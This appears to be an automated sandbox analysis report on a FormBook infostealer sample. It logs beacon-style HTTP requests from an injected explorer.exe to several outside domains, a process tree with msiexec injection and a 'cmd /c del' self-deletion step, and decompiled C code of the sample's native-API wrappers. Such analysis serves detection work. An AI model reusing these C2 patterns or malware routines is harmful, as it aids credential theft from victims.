                                                                    Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                    Apr 8, 2021 12:46:58.951575041 CEST | 5610 | IN
                                                                    Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    3 | 192.168.2.6 | 49742 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:47:09.092782021 CEST | 6398 | OUT | GET /goei/?EzuXh6BP=BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.foodsystemsjusticeproject.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:09.209527016 CEST | 6398 | IN | HTTP/1.1 403 Forbidden
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 275
                                                                    ETag: "606abe1d-113"
                                                                    Via: 1.1 google
                                                                    Connection: close
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    4 | 192.168.2.6 | 49743 | 193.168.194.206 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:47:17.752739906 CEST | 6399 | OUT | GET /goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.batiktintaemas.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:24.087763071 CEST | 6409 | IN | HTTP/1.1 301 Moved Permanently
                                                                    Connection: close
                                                                    X-Powered-By: PHP/7.2.34
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://batiktintaemas.com/goei/?EzuXh6BP=iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==&RL0=rVvxj02xpd_lyz
                                                                    Content-Length: 0
                                                                    Date: Thu, 08 Apr 2021 10:47:23 GMT
                                                                    Server: LiteSpeed
                                                                    Vary: User-Agent


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    5 | 192.168.2.6 | 49749 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Apr 8, 2021 12:47:33.692498922 CEST | 6429 | OUT | GET /goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.addthat.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Apr 8, 2021 12:47:33.802937031 CEST | 6430 | IN | HTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Thu, 08 Apr 2021 10:47:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA==
                                                                    Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a7msil34EyaoVjODEDUQ2ff4sUDhxeCYFMDh2tCvLxODdKADG02BsrkHtQfUPBUVH5YKtKdN4CUGklYGwKwPLA=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                    Apr 8, 2021 12:47:33.803009987 CEST6432INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                    Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                    Apr 8, 2021 12:47:33.803033113 CEST6433INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                    Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
                                                                    Apr 8, 2021 12:47:33.803052902 CEST6433INData Raw: 67 5f 70 64 2e 72 5f 77 68 3a 27 26 77 68 3d 27 2b 61 41 78 29 2b 0a 28 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 21 3d 3d 65 66 3f 27 26 72 65 66 5f 6b 65 79 77 6f 72 64 3d 27 2b 67 5f 70 64 2e 72 65 66 5f 6b 65 79 77 6f 72 64 3a 27 27 29
                                                                    Data Ascii: g_pd.r_wh:'&wh='+aAx)+(g_pd.ref_keyword!==ef?'&ref_keyword='+g_pd.ref_keyword:'')+(g_pc.$isWhitelisted()?'&abp=1':'')+($IE!==null?'&ie='+$IE:'')+(g_pd.partner!==ef?'&partner='+g_pd.partner:'')+(
                                                                    Apr 8, 2021 12:47:33.803070068 CEST6434INData Raw: 31 31 35 0d 0a 67 5f 70 64 2e 73 75 62 69 64 31 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 31 3d 27 2b 67 5f 70 64 2e 73 75 62 69 64 31 3a 27 27 29 2b 0a 28 67 5f 70 64 2e 73 75 62 69 64 32 21 3d 3d 65 66 3f 27 26 73 75 62 69 64 32 3d 27 2b 67 5f 70
                                                                    Data Ascii: 115g_pd.subid1!==ef?'&subid1='+g_pd.subid1:'')+(g_pd.subid2!==ef?'&subid2='+g_pd.subid2:'')+(g_pd.subid3!==ef?'&subid3='+g_pd.subid3:'')+(g_pd.subid4!==ef?'&subid4='+g_pd.subid4:'')+(g_pd.subid5!==ef?'&subid5='+g_pd.subid5:'');Sf.appendC


                                                                    Session ID: 6
                                                                    Source IP: 192.168.2.6
                                                                    Source Port: 49750
                                                                    Destination IP: 85.159.66.93
                                                                    Destination Port: 80
                                                                    Process: C:\Windows\explorer.exe

                                                                    Timestamp: Apr 8, 2021 12:47:38.938357115 CEST
                                                                    kBytes transferred: 6435
                                                                    Direction: OUT
                                                                    Data:
                                                                    GET /goei/?EzuXh6BP=1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.evecrude.xyz
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Timestamp: Apr 8, 2021 12:47:38.990061045 CEST
                                                                    kBytes transferred: 6436
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 404 Not Found
                                                                    Content-Type: text/html
                                                                    Server: Microsoft-IIS/10.0
                                                                    X-Powered-By: ASP.NET
                                                                    Date: Thu, 08 Apr 2021 10:47:16 GMT
                                                                    Connection: close
                                                                    Content-Length: 1245


                                                                    System Behavior

                                                                    General

                                                                    Start time:12:45:47
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:48
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:51
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:03
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x1a0000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:08
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x2a0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:12
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                      Executed Functions

                                                                      C-Code - Quality: 37%
                                                                      			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				void* _t18;
                                                                      				void* _t27;
                                                                      				intOrPtr* _t28;
                                                                      
                                                                      				_t13 = _a4;
                                                                      				_t28 = _a4 + 0xc48;
                                                                      				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                      				_t6 =  &_a32; // 0x413d52
                                                                      				_t12 =  &_a8; // 0x413d52
                                                                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                      				return _t18;
                                                                      			}







                                                                      APIs
                                                                      • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: R=A$R=A
                                                                      • API String ID: 2738559852-3742021989
                                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                      • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0041826B(void* __eax, void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                      				void* _t21;
                                                                      				void* _t32;
                                                                      				intOrPtr* _t33;
                                                                      				void* _t35;
                                                                      
                                                                      				 *(__eax - 0x1374aa1a) =  *(__eax - 0x1374aa1a) << 0x8b;
                                                                      				_t16 = _a4;
                                                                      				_t33 = _a4 + 0xc48;
                                                                      				E00418DC0(__ebx, _a4, _t33,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                                      				_t8 =  &_a32; // 0x413d52
                                                                      				_t14 =  &_a8; // 0x413d52
                                                                      				_t21 =  *((intOrPtr*)( *_t33))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t32, _t35); // executed
                                                                      				return _t21;
                                                                      			}








                                                                      APIs
                                                                      • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID: R=A$R=A
                                                                      • API String ID: 2738559852-3742021989
                                                                      • Opcode ID: d3c08aeb76a73d5e8864424ed4c1c39099f50e8e6a3d0b23c4bbf73bc67bcac2
                                                                      • Instruction ID: 63e6daace385307bb464b3db5f40c3fc627aba013f5e7f2710f4be0d336b7d24
                                                                      • Opcode Fuzzy Hash: d3c08aeb76a73d5e8864424ed4c1c39099f50e8e6a3d0b23c4bbf73bc67bcac2
                                                                      • Instruction Fuzzy Hash: 9BF01DB2200144ABCB04DF99D884CEB77ADAF8D214B15878DFA5C97252C630E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E0041839A(void* __eax, PVOID* _a4, long _a8, long* _a12, long _a16, long _a20) {
                                                                      				void* _v0;
                                                                      				intOrPtr _v4;
                                                                      				long _t15;
                                                                      				void* _t22;
                                                                      
                                                                      				_push(ds);
                                                                      				_push(ss);
                                                                      				asm("loop 0x57");
                                                                      				_t11 = _v4;
                                                                      				_t3 = _t11 + 0xc60; // 0xca0
                                                                      				E00418DC0(_t22, _v4, _t3,  *((intOrPtr*)(_v4 + 0x10)), 0, 0x30);
                                                                      				_t15 = NtAllocateVirtualMemory(_v0, _a4, _a8, _a12, _a16, _a20); // executed
                                                                      				return _t15;
                                                                      			}








                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID: )zA
                                                                      • API String ID: 2167126740-483804167
                                                                      • Opcode ID: 12aa7b6a7ac5d9d695dfdf5ad5a69c62b8e3a847ded82aa49320dff1433ad2e2
                                                                      • Instruction ID: c9538b3fa8a4b8b9efc2b01c4422a6d87bf5dcef235acebc7d0053ce5330c01c
                                                                      • Opcode Fuzzy Hash: 12aa7b6a7ac5d9d695dfdf5ad5a69c62b8e3a847ded82aa49320dff1433ad2e2
                                                                      • Instruction Fuzzy Hash: 2E011AB5200208ABCB04DF98DC81EEB77ADEF88754F10850DFE1897241DA35E851CBE4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00409B20(void* _a4, intOrPtr _a8) {
                                                                      				char* _v8;
                                                                      				struct _EXCEPTION_RECORD _v12;
                                                                      				struct _OBJDIR_INFORMATION _v16;
                                                                      				char _v536;
                                                                      				void* _t15;
                                                                      				struct _OBJDIR_INFORMATION _t17;
                                                                      				struct _OBJDIR_INFORMATION _t18;
                                                                      				void* _t30;
                                                                      				void* _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_v8 =  &_v536;
                                                                      				_t15 = E0041AB50(_a8,  &_v12, 0x104, _a8);
                                                                      				_t31 = _t30 + 0xc;
                                                                      				if(_t15 != 0) {
                                                                      					_t17 = E0041AF70(__eflags, _v8);
                                                                      					_t32 = _t31 + 4;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						E0041B1F0( &_v12, 0);
                                                                      						_t32 = _t32 + 8;
                                                                      					}
                                                                      					_t18 = E00419300(_v8);
                                                                      					_v16 = _t18;
                                                                      					__eflags = _t18;
                                                                      					if(_t18 == 0) {
                                                                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                      						return _v16;
                                                                      					}
                                                                      					return _t18;
                                                                      				} else {
                                                                      					return _t15;
                                                                      				}
                                                                      			}














                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
                                                                      • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                      • Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004181C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                      				long _t21;
                                                                      				void* _t31;
                                                                      
                                                                      				_t3 = _a4 + 0xc40; // 0xc40
                                                                      				E00418DC0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                      				return _t21;
                                                                      			}






                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                      • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                      				long _t14;
                                                                      				void* _t21;
                                                                      
                                                                      				_t3 = _a4 + 0xc60; // 0xca0
                                                                      				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                      				return _t14;
                                                                      			}






                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                      • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004182F0(intOrPtr _a4, void* _a8) {
                                                                      				long _t8;
                                                                      				void* _t11;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				_t2 = _t5 + 0x10; // 0x300
                                                                      				_t3 = _t5 + 0xc50; // 0x409743
                                                                      				E00418DC0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                      				_t8 = NtClose(_a8); // executed
                                                                      				return _t8;
                                                                      			}






                                                                      APIs
                                                                      • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
